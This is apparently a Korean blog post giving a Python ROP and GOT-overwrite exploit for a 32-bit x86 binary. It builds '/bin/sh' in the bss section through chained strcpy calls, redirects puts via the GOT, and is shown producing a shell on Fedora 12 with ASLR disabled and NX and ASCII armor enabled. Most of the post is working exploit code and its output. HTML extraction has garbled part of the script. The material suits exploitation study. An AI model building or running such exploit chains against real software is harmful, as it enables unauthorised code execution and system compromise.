[intel][x86] ROP

#!/usr/bin/env python # # #	ROP + GOT overwrite # #  import struct  p = lambda x : struct.pack("<l",x) up="lambda" x="" :="" struct.unpack(">L",x)[0]  # var  strcpy = p(0x08048374) puts_got = [p(0x804975c),p(0x804975d),p(0x804975e),p(0x804975f)] puts_plt = p(0x8048394) ppr = p(0x8048588) bbs = [p(0x08049774),p(0x08049775),p(0x08049776),p(0x08049778),p(0x08049779),p(0x0804977a),p(0x0804977b)]  hex_00 = p(0x0804976c) hex_1d = p(0x0804976e) hex_b7 = p(0x08049770) hex_e0 = p(0x08049772)  str_slash = p(0x08048134) str_b = p(0x08048137) str_in = p(0x0804813d) str_s = p(0x08048142) str_h = p(0x0804835a) str_null = p(0x0804833a)  # dummy  payload = "" payload += "A" * 272  # stage - 1 strcpy(bbs,"/bin/sh")  payload += strcpy payload += ppr payload += bbs[0] payload += str_slash  payload += strcpy payload += ppr payload += bbs[1] payload += str_b  payload += strcpy payload += ppr payload += bbs[2] payload += str_in  payload += strcpy payload += ppr payload += bbs[3] payload += str_slash  payload += strcpy payload += ppr payload += bbs[4] payload += str_s  payload += strcpy payload += ppr payload += bbs[5] payload += str_h  payload += strcpy payload += ppr payload += bbs[6] payload += str_null  # stage - 1 GOT overwrite ( got_puts)  payload += strcpy payload += ppr payload += puts_got[0] payload += hex_e0  payload += strcpy payload += ppr payload += puts_got[1] payload += hex_b7  payload += strcpy payload += ppr payload += puts_got[2] payload += hex_1d  payload += strcpy payload += ppr payload += puts_got[3] payload += hex_00  # stage - 0   payload += puts_plt payload += "B" * 4 payload += bbs[0]  print (payload) </l",x)>

ROP 환경은

Fedora release 12 커널 2.6

일단 ASLR을 종료한 상태이다.

ulimit -s unlimited로 종료했고 걸려 있는 거는

NX,ASCII amor가 걸려있는 상태였고

 

페이로드는 ROP와 GOT overwirte두가지 동시에 사용 되었습니다.

 

./vuln `python vuln.py`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtƒˆ…t—4tƒˆ…u—7tƒˆ…v—=tƒˆ…x—4tƒˆ…y—Btƒˆ…z—Zƒtƒˆ…{—:ƒtƒˆ…\—r—tƒˆ…]—p—tƒˆ…^—n—tƒˆ…_—l—”ƒBBBBt—

sh-4.0$ 

 

이런식으로 실행됩니다.